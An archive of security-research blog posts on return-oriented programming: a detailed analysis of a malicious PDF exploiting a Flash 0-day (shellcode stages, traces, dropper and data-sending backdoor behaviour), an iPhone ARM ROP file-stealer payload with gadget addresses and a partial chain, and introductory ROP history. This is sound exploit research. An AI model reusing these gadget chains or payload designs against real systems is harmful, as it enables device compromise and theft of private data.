Archive for the ‘ROP’ Category

Las Vegas & the zynamics team

Wednesday, July 14th, 2010

Along with RECon, the single most important date in the reverse engineering / security research community is the annual Blackhat/DefCon event in Las Vegas. Most of our industry is there in one form or the other, and aside from the conference talks, parties and award ceremonies, there’s also a good amount of technical discussions (in bars or elsewhere) that takes place.

This year, a good number of researchers/developers from the zynamics Team will be present in Las Vegas — alphabetically, the list is:

  1. Ero Carrera
  2. Thomas Dullien/Halvar Flake
  3. Vincenzo Iozzo
  4. Tim Kornau

So, if you wish meet any of the team to discuss reverse engineering, our technologies, our research, or the performance of the Spanish or German football team at the last world cup, do not hesitate to drop an email to — Vegas is always chaotic, and scheduling a meeting will minimize stress for everyone that is involved.

Specifically, the following topics are specifically worth meeting over:

  1. Chat with Ero over our unpacking engine (just presented at RECon) — and how it fits into the larger scheme of things (e.g. VxClass)
  2. Meet with Tim or Vincenzo to discuss automated gadget-finding for ROP, or anything involving the ARM/REIL translations
  3. Meet with Thomas/Halvar to discuss VxClass, automated malware clustering, automated generation of “smart” malware signatures etc.

Aside from this, if you are interested in …

  • … boosting your reverse engineering performance by porting symbols from FOSS software into your closed-source disassemblies (BinDiff)
  • … becoming faster at finding bugs by leveraging differential debugging, the REIL intermediate language and static analysis frameworks (BinNavi)
  • … enhancing team-based reverse engineering by pooling accumulated knowledge and sharing information (BinCrowd)
  • … automatically correlating and clustering malware and forensically obtained memory dumps, and automatically deriving detection mechanisms (VxClass)
  • … analyzing malicious PDF files including the embedded JavaScript code (PDF Dissector)

then do not hesitate to drop us mail — we’ll gladly show/explain what our tools/technologies can do.

See you there !

A brief analysis of a malicious PDF file which exploits this week's Flash 0-day

Wednesday, June 9th, 2010

I spent the last two days with a friend of mine, Frank Boldewin of, analyzing the Adobe Reader/Flash 0-day that’s being exploited in the wild this week.   We had received a sample of a malicious PDF file which exploits the still unpatched vulnerability (MD5: 721601bdbec57cb103a9717eeef0bfca) and it turned out more interesting than we had expected. Here is what we found:

Part I: The PDF file

The PDF file itself is rather large. Analyzing the file with PDF Dissector, I found two interesting streams inside the PDF file. Later I will describe that there is actually a third interesting stream, belonging to object 17, in the PDF file. This stream contains an encrypted EXE file which will be dropped and executed by the shellcode. This can not be known before analyzing the shellcode though.

The first interesting stream can be found in PDF object 1. It is a binary stream that starts with the three characters CWS, the magic value of compressed Flash SWF files headers. I dumped this stream to a file and it turned out to be a valid Flash file.

The second interesting stream belongs to PDF object 10. This stream contains a very short JavaScript code snippet that heap-sprays a huge array onto the heap. In the screenshot below you can see the original code.

I then used PDF Dissector to execute the JavaScript code. The byte array that gets heap-sprayed is stored in the variable _3 after execution. I dumped this byte array to a file (see heapspray.bin in the ZIP file at the end of this post) and disassembled it with IDA Pro.

Later it will become clear that the embedded SWF file is actually exploiting the Flash player and not Adobe Reader (or rather it exploits the Flash player DLL that is shipped with Adobe Reader). The purpose of the PDF file is primarily to massage the heap into a predictable state for the Flash player exploit.

Part II: The shellcode – Stage I

In the disassembled file I expected to see a nop-sled followed by regular x86 code but this is not what I found. There is something that looks like a huge nop-sled (a long list of ‘or al, 0Ch’ instructions) but no valid code follows that nop-sled (which will later turn out not to be a nop-sled at all). Rather, following the ‘nop-sled’ I found a list of addresses that point into code of an Adobe Reader DLL called BIB.DLL. We were dealing with return-oriented shellcode here.

You can find the documented IDB of the shellcode in the ZIP file at the end of this post. For now please click on this link for a text file that contains the documented code. The beginning looks like

seg000:00000BEC     dd 7004919h             ; pop ecx
seg000:00000BEC                             ; pop ecx
seg000:00000BEC                             ; mov dword ptr [eax+0Ch], 1
seg000:00000BEC                             ; pop esi
seg000:00000BEC                             ; pop ebx
seg000:00000BEC                             ; retn
seg000:00000BF0     dd 0CCCCCCCCh           ; ecx = 0xCCCCCCCC
seg000:00000BF4     dd 70048EFh             ; ecx = 0x070048EF
seg000:00000BF8     dd 700156Fh             ; esi = 0x0700156F
seg000:00000BFC     dd 0CCCCCCCCh           ; ebx = 0xCCCCCCCC
seg000:00000C00     dd 7009084h             ; retn
seg000:00000C04     dd 7009084h             ; retn

and continues for quite a while. The first column shows the address. The second column shows the values on the stack (primarily addresses to ROP gadgets in BIB.DLL). The third column shows what instructions can be found at the given addresses in BIB.DLL and what effects the shellcode has.

The ROP shellcode is a variant of the code found in this exploit POC by villy. At first, the shellcode allocates memory using NtAllocateVirtualMemory (accessed through sysenter). Then, it copies a second stage shellcode to the allocated memory and executes it.

BIB.DLL is actually a DLL file that gets randomly relocated if you have address-space layout randomization enabled on your system. Systems with enabled ASLR can not be exploited by this malicious PDF file. This does not mean that the vulnerability can not be exploited if ASLR is enabled, it’s just that the particular sample we looked at will not work in that case.

Part III: The shellcode – Stage II

The second stage shellcode is rather short. All it does is to copy the third stage shellcode to the memory allocated by the first stage. Afterwards the third stage is executed. An IDB file for the second stage is included in the ZIP file at the end of this post.

[code]seg000:00000000  pop     edx
seg000:00000001  nop
seg000:00000002  push    esp
seg000:00000003  nop
seg000:00000004  pop     edx
seg000:00000005  jmp     short loc_1C
seg000:00000007 loc_7:
seg000:00000007  pop     eax
seg000:00000008 In this loop of the second stage of
the shellcode, the third stage of the shellcode
seg000:00000008 is copied to a known address (memory allocated
by the first ROP stage) and executed afterwards.
seg000:00000008 CopyLoop:
seg000:00000008  mov     ebx, [edx]
seg000:0000000A  mov     [eax], ebx
seg000:0000000C  add     eax, 4
seg000:0000000F  add     edx, 4
seg000:00000012  cmp     ebx, 0C0C0C0Ch  ; Search for this signature to stop copying.
seg000:00000018  jnz     short CopyLoop
seg000:0000001A  jmp     short CopyTarget
seg000:0000001C loc_1C:
seg000:0000001C  call    loc_7
seg000:00000021 After the copy loop is complete, the third stage of the shellcode begins here.
seg000:00000021 CopyTarget:
seg000:00000021  nop

Part IV: The shellcode – Stage III

The third stage is larger again. First, it resolves a bunch of Windows API functions through name hashes. Then, it tries to figure out which open file handle points to the malicious PDF file itself. This is done by estimating the file size of the malicious PDF file and by scanning potential candidate files for two characteristic signatures. If the malicious PDF file is found, a section of the PDF file (the third interesting stream I mentioned above) is decrypted using a simple XOR decryption and then written to the file C:\-.exe. This file is then executed.

Since the third stage is part of the heap-sprayed data you can actually find the third stage code in the IDB file of the ROP stage.  The third stage code begins right after the ROP stage ends. If you want to check out the code of the third stage right now, please click on this link to see the text dump.

Part V: The dropped file -.exe

Inside the ZIP package at the end of this post you can find the commented IDB file of -.exe. Once again, this file is rather simple. Here is what it does:

  • It checks whether the current user is an administrator account.
  • If it’s not, download and execute it. Then shut down -.exe.
  • If it is, it extracts a file called C:\windows\EventSystem.dll and a file called C:\windows\system32\es.ini from its own resource section.
  • The BITS service (Background Intelligent Transfer Service) is shut down.
  • Windows file protection is disabled.
  • The original qmgr.dll file is moved to kernel64.dll
  • EventSystem.dll replaces the original C:\windows\system32\qmgr.dll, C:\windows\system32\dllcache\qmgr.dll and c:\windows\servicepackfiles\i386\qmgr.dll
  • qmgr.dll, EventSystem.dll, and es.ini get the timestamp of the original qmgr.dll
  • The BITS service is started again, now with the dropped qmgr.dll instead of the original qmgr.dll

If you want to check out the code right now, you can click on this link to see the disassembled file.

Part VI: The dropped file EventSystem.dll

The primary purpose of EventSystem.dll, the DLL file that was registered as a service by -.exe, is to collect information about the user’s system and to send it to a server controlled by the attacker. You can see a dump of what information is collected and sent in this log file.

Additionally, the EventSystem.dll file also contains code that can download new files from the internet and execute them afterwards. You can check out the IDB file in the ZIP file at the end of this post for a complete disassembly.

Part VII: Finding the vulnerability in the Flash player

The description of the shellcode is now complete, but one question remains: What is actually the vulnerability in the Flash player? Here is what we found:

The first step was to figure out when control flow is transferred from regular Flash player code to the first stage of the shellcode. At zynamics we have a Pin tool plugin we use to automatically recognize  shellcode and dump it to a file. You can find the complete trace generated by the Pin tool plugin in the ZIP file (pin_trace.txt). Here is the important part:

[code]0x0700156F::BIB.dll  8B 41 34                mov eax, dword ptr [ecx+0x34]
0x07001572::BIB.dll  FF 71 24                push dword ptr [ecx+0x24]
0x07001575::BIB.dll  FF 50 08                call dword ptr [eax+0x8]
0x070048EF::BIB.dll  94                      xchg esp, eax
0x070048F0::BIB.dll  C3                      ret
0x07004919::BIB.dll  59                      pop ecx
0x0700491A::BIB.dll  59                      pop ecx
0x0700491B::BIB.dll  C7 40 0C 01 00 00 00    mov dword ptr [eax+0xc], 0x1[/code]

At address 0x07004919 of BIB.dll, the ROP code of the first stage is executed. Two instructions before, at address 0x070048EF, the original stack of the executing thread is replaced by something controlled by the attacker.

To figure out where control flow is coming from it is possible to set a breakpoint on the XCHG instruction and take a look at the stack. The return value of the active stack frame will point to memory on the heap where you can find code. This code does not belong to any code section of any module, so where does it come from? Turns out that this code is just-in-time compiled ActionScript code that is created from the malicious SWF file inside the malicious PDF file.

To analyze exactly how control flow is transferred from the JIT-ed ActionScript code to the ROP stage of the shellcode, I have created a trace with OllyDbg that shows all instructions that are executed after the just-in-time compilation of the ActionScript code but before the ROP code. You can find the trace in the ZIP file at the end of this post (olly_trace.txt). Here are the important parts:

[code]28CDE2A0  mov eax,dword ptr ss:[ebp-44]

28CDE2C0  mov edx,dword ptr ds:[eax+10]     EAX=25966241

28CDE2C6  mov ecx,dword ptr ds:[edx+2b8]    EAX=25966241, EDX=20259384

28CDE2D5  mov dword ptr ss:[ebp-60],ecx     EAX=25966241, ECX=0C0C0C0C, EDX=00259685

28CDE2EF  mov ecx,dword ptr ss:[ebp-60]     EAX=25966241, ECX=0012F5D0, EDX=00259685

28CDE2F8  call dword ptr ds:[ecx+0c]        EAX=25966241, ECX=0C0C0C0C, EDX=00259685[/code]

The call at 28CDE2F8 goes directly to 0x0700156F in BIB.dll (see the Pin tool trace). So what is going on here? To understand these six lines of code you have to know a bit about the memory layout at address 0x25966241 (the value in EAX) and about the internals of just-in-time compiled ActionScript code.

Let’s start with the memory layout. Here is what I saw at 0x25966241 (note that the dump starts at 0x25966240).

[code]0x25966240   C8 0E 3D 30  05 00 00 20  00 00 00 00 00 00 00 00
0x25966250   78 84 93 25  20 44 90 25[/code]

Now eax (0x25966241) is used as a pointer in instruction 0x28CDE2C0. You might already notice that the pointer is not aligned at all. This is unusual. Now comes the part where you need to know about compiled ActionScript internals.

When values like integer numbers or objects are created by ActionScript scripts, pointers to these objects are created and stored. Interestingly, all ActionScript values must be 8-byte aligned because the lowest three bits of pointers to such values are used to encode type information about the values. For example, if the lowest three bits of such a pointer are 101, then the pointed-to value is a boolean value. 111 identifies a double value and so on.

So apparently what is happening in the above code is that a pointer that includes type information is used as a regular pointer without stripping the type information first. If you debug this piece of code and manually clear the lowest three bits to remove the type information, the value 25966241 turns into 25966240 (which itself contains a pointer to a v-table of a class called ScriptObject, lending more credence to the theory I am exploring here). So, when [eax+10] is read without stripping the type information, the pointer 0x20259384 is read. This pointer points to the binary data that was heap-sprayed by the JavaScript code of the PDF file. If you do strip the type information though, you get the pointer 0x25938478 which is a legitimate pointer to another part of the just-in-time compiled ActionScript code.

After instruction 28CDE2C0 the register EDX points to the heap-sprayed values. Most of the heap-sprayed values are 0x0C0C0C0C DWORD values, so edx+2b8 most likely points to such a DWORD value and 0x0C0C0C0C is moved into register ECX. Through some clever heap-spraying, one iteration of the heap-sprayed data actually starts at address 0x0C0C0C0C so the memory layout starting from 0x0C0C0C0C is controlled by the attacker. He then controls the value of [ecx+0c], the address of the function to be executed next.

If you go back to the JavaScript code in the malicious PDF file now, you can see the value 156f0700 close to the beginning of the heap-sprayed string. This is just the value 0x0700156F which is the entry point to the attacker-controlled control-flow in BIB.dll (see the Pin trace above again).

We know now how control flow is transferred from the just-in-time compiled code to the shellcode. The question that remains is why does the JIT-compiler produce code that leads to incorrect pointer usage?

There are two possible options here. The first one is that the JIT-compiler has a bug and emits wrong x86 code, code that forgets to strip off the type information. I don’t think this is the case because the emitted code that leads to the control-flow hijack is generated in benign cases too. I think it is far more likely that the compiler assumes pre-conditions about the generated code that are not true in this particular situation. In all of the benign cases I have observed, the type information was stripped from the pointer before the JIT code was even executed. In the malicious case this does not happen which leads me to believe that the compiler emits code that assumes that all input pointers to that code segment have been stripped of their type information but apparently this is not always the case.

Let’s look at what could trip up the JIT compiler.

Part VII: The malformed Flash file

Using the SWFTools disassembler we had a look at the Flash file that was embedded in the PDF file. It quickly turned out (by looking at characteristic strings) that the Flash file is a modified version of AES-PHP.swf from Disassembling and comparing the original SWF file to the malicious PDF file generated just a single difference.

[code]00206) + 0:1 getlex <q>[protected]fl.controls:LabelButton::icon</q>
00207) + 1:1 getlex <q>[public]::Math</q>
00208) + 2:1 getlocal_2
00209) + 3:1 getlex <q>[public]fl.controls::ButtonLabelPlacement</q>
00210) + 4:1 getproperty <q>[public]::BOTTOM</q>
00211) + 4:1 ifne ->218[/code]

[code]00206) + 0:1 getlex <q>[protected]fl.controls:LabelButton::icon</q>
00207) + 1:1 getlex <q>[public]::Math</q>
00208) + 2:1 getlocal_2
00209) + 3:1 getlex <q>[public]fl.controls::ButtonLabelPlacement</q>
00210) + 4:1 newfunction [method 000001ba ]
00211) + 5:1 ifne ->218[/code]

The only difference can be found in line 210. While the benign Flash file tries to access the property BOTTOM, the malicious Flash file tries to create a new function object. This simple change messes up the internal ActionScript stack (as can be seen in the differing stack depth numbers after the +) because getproperty and newfunction have different effects on the ActionScript stack. Subsequent ActionScript instructions then assume a stack layout which is simply wrong. Nevertheless, the JIT compiler seems to accept this code and generates x86 code for it. The consequence of this change seems to be that preconditions for JIT-compiled code that were previously true do not hold anymore and the attacker can control the control flow as seen above.

Part VIII: The end

Now it would be interesting to figure out exactly what trips up the JIT code generation to see how it gets into this situation. I think we are going to wait for the patch for this and just use BinDiff to compare the patched version of the Flash player with the unpatched version. 🙂

You can get the malicious PDF file and all the IDB files and traces we generated from this ZIP file. We have also submitted -.exe to CWSandbox. You can see the generated report about the file’s activity here.

Oh yeah, the malicious PDF file is in the ZIP package too. Pay some attention there and don’t backdoor yourself accidentaly. The password to the ZIP file is ‘infected’.

ROP and iPhone

Friday, April 16th, 2010

As you might know I and Ralf-Philipp Weinmann from University of Luxembourg won pwn2own owning the iPhone.

Smartphones are different beasts compared to desktops when it comes to exploitation. Specifically the iPhone has a fairly important exploitation remediation measure, code signing, which makes both exploitation and debugging quite annoying and definitely raises the bar when it comes to writing payloads.

What smartphones usually miss, and that is the case for iPhone as well, is ASLR. Add up the two and we have the perfect OS on which to use ROP payloads.

We are not authorized to talk about the exploit itself as it is being sold to ZDI, nonetheless we want to give a brief explanation on the payload because to the best of our knowledge it is the first practical example of a weaponized payload on ARMv7 and iPhone 3GS.

In order to decide what kind of payloads we want to write, another security countermeasure has to be taken into account, namely Sandboxing.

On iPhone most applications are sandboxed with different levels of restrictions. The sandboxing is done in a kernel extension using the MAC framework. A few well-known syscalls are usually denied(execve() to name one) and normally access to important files is restricted. One last important thing to notice is that the iPhone doesn’t have a shell, so that is not an option for our payload.

Luckily we are able to read files like the SMS database, the address book database and a few others containing sensitive information (this depends on the specific sandbox profile of the application).

A few notions are needed to be able to write ARM payloads, a lot of good information on the topic can be found here. I will nonetheless outline the basics needed below.

The first thing one has to understand before writing a ROP payload is the calling convention used in iPhoneOS.

For iPhone the first four arguments are passed using r0-r3 registers. If other arguments are needed those are pushed onto the stack. Functions usually return to the address pointed by the LR register so when we write our payload we need to make sure that we control LR.

Another important difference between ARM ROP payloads and x86 ROP payloads are instruction sizes.

In ARM there are only two possible sizes for instructions: 4 bytes or 2 bytes. The second type is called THUMB mode. To access THUMB instructions one has to set the program counter to addresses that are not 4-bytes aligned, this will cause the processor to switch to THUMB mode. More formally the processor will switch to THUMB mode when the T bit in the CPSR is 1 and the J bit is 0.

Starting from ARMv7 a “hybrid” mode was introduced, THUMB2. This mode supports both 32bits and 16bits instructions (the switch between 32 bits and 16 bits is done following the same criteria explained before for THUMB).

One last thing has to be noticed is that usually functions are called through b/bl/blx instructions, when writing our payload we are almost always forced not to use bl and blx. In fact those two instructions will save the next instructions into the lr register, thus we lose control over the program flow.

I won’t describe in details the concepts behind ROP as there is plenty of literature available. Tim is writing about ROP on ARM in our blog as well.

I will instead try to outline what important steps are needed when it comes to writing an ARM ROP payload on the iPhone.

In our exploit we know that some data we control lies in r0. The first thing we want to achieve is to control the stack pointer. So we have to find a sequence that allows us to switch the stack pointer with a memory region we control. We do this in two stages:

6a07 ldr r7, [r0, #32]
f8d0d028 ldr.w sp, [r0, #40]
6a40 ldr r0, [r0, #36]
4700 bx r0

// r0 is a pointer to the crafted data structure used in the exploit. We point r7 to our crafted stack, and r0 to the address of the next rop gadget.
// The stack pointer points to something we don’t control as the node is 40 bytes long. So we just to another code snippet which will put us in control of SP.

f1a70d00 sub.w sp, r7, #0 ;0x0
bd80 pop {r7, pc}

Now that we control the stack pointer we can take a closer look at our payload.

A file stealer payload should in principle do the following:

  1. Open a file
  2. Open a socket
  3. Connect to the socket
  4. Get the file size (using for instance fstat())
  5. Read the content of the file (in our case by mmaping it into memory)
  6. Write the content of the file to the remote server
  7. Close the connection
  8. Exit the process/continue execution

This is quite a long list for a ROP shellcode therefore we are not going to discuss each and every step, but just highlight some that are very important.

The first thing our payload needs to do is to control the content of lr register, a gadget that allows us to do so is:

e8bd4080 pop {r7, lr}
b001 add sp, #4
4770 bx lr

Next we will see an example of how a function can be called using ROP on ARM. We take as an example mmap() because it has more than 4 arguments therefore it is a bit trickier:

ropvalues[i++] = 0x00000000; //r4 which will be the address for mmap
ropvalues[i++] = 0x00000000; //r5 whatever
ropvalues[i++] = 0x000000000; //r8 is gonna be the file len for mmap
ropvalues[i++] = 0x000000002; //r9 MAP_PRIVATE copied in r3
ropvalues[i++] = 0x32988d5f; // PC
//32988d5e bd0f pop {r0, r1, r2, r3, pc}

ropvalues[i++] = locFD – 36; // r0 contains the memory location where the FD is stored
ropvalues[i++] = locStat +60; // r1 struct stat file size member
ropvalues[i++] = 0x00000001; // r2 PROT_READ
ropvalues[i++] = 0x00000000; // r3 is later used to store the FD in the following gadget
ropvalues[i++] = 0x32979837;
//32979836 6a43 ldr r3, [r0, #36]
//32979838 6a00 ldr r0, [r0, #32]
//3297983a 4418 add r0, r3
//3297983c bd80 pop {r7, pc}
ropvalues[i++] = sp + 73*4 + 0x10;
ropvalues[i++] = 0x32988673;
//32988672 bd01 pop {r0, pc}
ropvalues[i++] = sp -28; //r0 has to be a valid piece of memory we don’t care about(we just care for r1 here)
ropvalues[i++] = 0x329253eb;
//329253ea 6809 ldr r1, [r1, #0]
//329253ec 61c1 str r1, [r0, #28]
//329253ee 2000 movs r0, #0 //this will reset to 0 r0 (corresponding to the first argument of mmap())
//329253f0 bd80 pop {r7, pc}
ropvalues[i++] = sp + 75*4 + 0xc; //we do this because later SP will depend on it
ropvalues[i++] = 0x328C5CBd;
//328C5CBC STR R3, [SP,#0x24+var_24]
//328C5CBE MOV R3, R9 //r9 was filled before with MAP_PRIVATE flag for mmmap()
//328C5CC0 STR R4, [SP,#0x24+var_20]
//328C5CC2 STR R5, [SP,#0x24+var_1C]
//328C5CC4 BLX ___mmap
//328C5CC8 loc_328C5CC8 ; CODE XREF: _mmap+50
//328C5CC8 SUB.W SP, R7, #0x10
//328C5CCC LDR.W R8, [SP+0x24+var_24],#4
//328C5CD0 POP {R4-R7,PC}

ropvalues[i++] = 0xbbccddee;//we don’t care for r4-r7 registers
ropvalues[i++] = 0x00000000;
ropvalues[i++] = 0x00000000;
ropvalues[i++] = 0x00000000;
ropvalues[i++] = 0x32987baf;
//32987bae bd02 pop {r1, pc}

This payload snippet roughly traslates to:

[sourcecode language=”cpp”]
mmap(0x0, statstruct.st_size, PROT_READ, MAP_PRIVATE, smsdbFD, 0x0);

What we had to do here is to store the arguments both inside the registers (the easy part) and to push two of them onto the stack.

Pushing arguments on the stack creates an extra problem when writing a ROP payload because we have to make sure our payload is aligned with the stack pointer, this is why we to craft r7 in a specific way in line 26.

Finally we pop the program counter and jump to some other instructions in memory.

Having seen this payload one may wonder how to find the proper gadgets in the address space of a process.

As said before iPhone doesn’t have ASLR enforced which means that every library mapped in the address space is a possible source of gadgets.

There are some automated tools to find those gadgets and compile them to form a ROP shellcode on x86. Unfortunately that is not the case for ARM. Our co-worker Tim maintains and develops a great tool written for his thesis that can ease the process of finding gadget on ARM and he is currently working on extending the tool to compile (or better combine) gadgets to form valid shellcode.

As far as we know no techniques to disable code signing “on the fly” have been found on the latest firmware of iPhone.

It is therefore important for anyone trying to exploiting an iPhone vulnerability to learn ROP programming.

One last thing has to be said: the iPhone security model is pretty robust as it is now.

If it would ever support ASLR attacking it will be significantly harder than any desktop OS. In fact, most applications are sandboxed which greatly limits their abilities of doing harm and code signing is always in place. ASLR will limit the ability of creating ROP payloads and there are neither Flash nor a JIT compiler to play with on the iPhone;)

Finally if you are interested in iPhone hacking you should attend the class that I am going to give together with Dino Dai Zovi at Black Hat USA. It will be on Mac OS X hacking but most of the teaching material can be used on iPhone as well!


Algorithms for platform independent return-oriented programming (I of III)

Friday, April 16th, 2010

In my last post about the history of return-oriented programming I showed that we are not dealing with a completely new technology when we are talking about return-oriented programming. However, the technology is evolving to a point where even the world of academia thinks it worth discussing it in theoretical conferences. Until recently return-oriented programming has always been platform dependent so that one specific implementation was only able to work on one single platform. To sharpen the point a little further current approaches only target one specific compiler for one platform in general. Even though this is not necessarily the case for variable length instruction sets like the IA-32/64 instruction set, where the search for instruction sequences can be performed without paying attention to the alignment restrictions, for all platforms where alignment is enforced the current approaches are still very limited.

In this post I will start showing a set of algorithms which can be used platform independently to locate suitable instruction sequences for return-oriented programming.

So let’s get started with defining return-oriented programming to get an idea where we are eventually trying to end up with.

The goal is to build a program from existing code chunks of another program or commonly used libraries. A program built from the parts of another binary is called a return-oriented program. The individual parts that form a return-oriented program are named gadgets. A gadget is a sequence of instructions in the target binary that provides a usable operation, such as addition of two registers. To be able to build a program from gadgets, they must be combinable. Gadgets are combinable if they end in an instruction that changes control flow in a way that can be controlled by the attacker. Instructions at the end of gadgets are named free-branch instructions. A free-branch instruction must satisfy the following properties:

  • The control flow must change at this instruction.
  • The target of the control flow must be controllable (free) such that the input from an attacker controled register or memory offset defines the target.

After this small definition of what we are actually looking for we can now move on and discuss the algorithms which we will use to help us find instruction sequences which satisfy the above definition.

As we need a starting point for our search of useful instruction sequences, the first step is to locate all free-branch instructions in the targeted binary (In BinNavi this is a single SQL query). After we have collected all of the free-branch instructions we start with phase one of our algorithms, data collection within the binary. The goal of the data collection phase is to provide us with the following information:

  • What possible paths are usable for gadgets and end in a free-branch instruction.
  • What does the REIL representation of the instructions on the possible paths look like.

If you are not familiar with REILs ([R]everse [E]ngineering [I]ntermediate [L]anguage) concepts be sure to check our article we have posted a while back to get you started.

Now that we have a goal definition for our first phase algorithms we can start looking into the algorithms to get the desired data. To find all paths which could provide useful instruction sequences for gadgets we use an algorithm which traverses backwards through the control flow graph of all the functions where we found free-branch instructions. Using the free-branch instruction as our starting point we walk upwards instruction by instruction until no more instructions are contained in the initial basic block. The following graphic shows examples for ARM and MIPS free-branch instructions.

Examples for free-branch instructions (more…)

A gentle introduction to return-oriented programming

Friday, March 12th, 2010


As I have promised in my last post I will start a series about return-oriented programming. I start with a short introduction about the topic. The introduction covers the origin of return-oriented programming, describes what return-oriented programming is and ends with a definition of return-oriented programming which I will use in the future posts. I will also take some of the recent discussions on Twitter into account which showed that even though I thought I did my history research pretty well, there were still some mailing list post missing from my time-line.

Why do we need return-oriented programming ?

Return-oriented programming is a technique which allows an attacker to execute code in the presence of the following defensive measures.

  • Non executable memory segments
  • Code signing

Where does return-oriented programming come from ?

Return-oriented programming is a recently coined term which describes a technique that has been developed in an iterative process in the security community. The terminology return-oriented programming is used for a subset of techniques which can be referred to as code reuse techniques. To understand where return-oriented programming comes from I show some of the milestones of the techniques history.

Buffer overflows were first publicly documented in the Computer Security Technology Planning Study in 1972 (Appendix 1. Incomplete Parameter Checking). To put this in perspective one must remember that even though we now know that this document was published at the time only a small circle of individuals had access to the document then.

A buffer overflow is, in the original form, a very simple error that is introduced if a function does not perform proper bounds checking for the accessed memory. Basically this means the function receives more input data than it can store. Assuming that the overflowed buffer was located on the stack, the attacker can now write a certain amount of data onto the stack where other variables and the return address might be located. Therefore the attacker can hijack the control flow of the current process and perform an arbitrary computation.

The first major attack which used a buffer overflow as the targeted vulnerability was the Morris worm in 1988. But it was not until the late 90s that major operating systems started to have any protection against buffer overflows. For Microsoft operating systems a form of protection against buffer overflows was only added after the Code-Red and Slammer worms had changed their security mindset in 2004.

One of the defensive measures which have been developed to defend against buffer overflows is the option to mark data memory segments as non-executable. This lead to the next evolutionary step towards return-oriented programming.

Return-into-library technique

The return-into-library technique is the root on which all return-oriented exploit approaches are based.

A return-into-library exploit works as follows: After the attacker has hijacked the control flow, a library function he chooses is executed. The attacker has made sure that the stack pointer points into a memory segment he controls. The attacker has set up the data in the memory segment in a way that it provides the right arguments to the library function of his choice. Through this he can execute a function with the needed arguments.

The technique of return-into-library exploits was initially presented publicly by Solar Designer in his 1997 posting to the Bugtraq mailing list. In this mail the groundwork for return-into-library exploiting was presented. The next milestone in the development of the technique was the Phrack article by Nergal which summarized the known techniques and broadened the attack vector by introducing esp shifting which allowed unlimited chaining of function calls to be used within return-into-library exploitation.

Borrowed code chunks technique

With the introduction of hardware-supported non-executable memory segments in combination with the support of 64 Bit CPUs the game changed again and traditional return-into-library exploits ceased to work. This was due to an ABI change which now required that the arguments to a function must be passed in registers rather than on the stack. Stealth developed a new approach that uses chunks of library functions instead of the call to the function itself to still be able to exploit buffer overflows on machines that employed the newly introduced defense. The approach is designed around the idea to locate instruction sequences which pop values from the stack into the right registers for function calls. By using his approach an attacker can use return-into-library exploits with the new ABI. A library which uses this technique in an automated fashion is DEPLib which has been developed by Pablo Sole. This library completely automates the return-oriented approach for Windows operating systems but it lacks support for loops and conditional branches (which is from a practical point of view negligible).

Return-oriented programming

The return-oriented programming technique broadens the attack vector even further by introducing loops and conditional branches for the return-oriented approach. The first academic work published in the field of return-oriented programming is Hovav Shacham’s ”The Geometry of Innocent Flesh on the Bone: Return-into-libc without function Calls (on the x86)” It describes the two major points which get addressed by return-oriented programming in contrast to the rest of the return-into-library techniques.

  • The return-into-library technique has no support for loops and conditional branching.
  • The removal of functions from libraries does not provide any security against return-oriented programming.

For the x86 the approach he uses to find suitable instruction sequences is based on the fact that the x86 uses a variable length instruction set. Therefore it is possible to search for single binary opcodes which alter control flow such as the return instruction (0xC3) and disassemble the binary from this position backwards. Because x86 uses a variable length instruction set the bytes before the return instruction can provide many possible instruction sequences. Shacham also defined the term gadget which describes one useful instruction sequence which performs one useful operation such as addition.

One assumption which Shacham made is that he thought a fixed length instruction set would make the application of return-oriented programming unfeasible. This was shown not to be the case by Ryan Roemers work which targeted the SPARC architecture which can be seen as the anti-thesis to the x86 architecture. One change which he needed to incorporate into his gadget set was that only memory could be used to pass information between gadgets. This is due to the way SPARC passes information in registers by shifting the register window.

The most practical work which has been published in the field of return-oriented programming is the recent work which targeted the AVC Advantage voting system. This work has provided proof that return-oriented programming is a valid tool for the offensive security researcher as no other technique would have been as useful against the Harvard-type architecture upon which the AVC Advantage is build.

What did we learn ?

Return-oriented programming is a recently coined term but the underlying technology has a long history which is based on the work of many security researchers. We have started with its roots in return-into-library attacks and showed how it evolved until today.

In the next post on return-oriented programming I will explain the first steps of my approach to make return-oriented programming platform independently.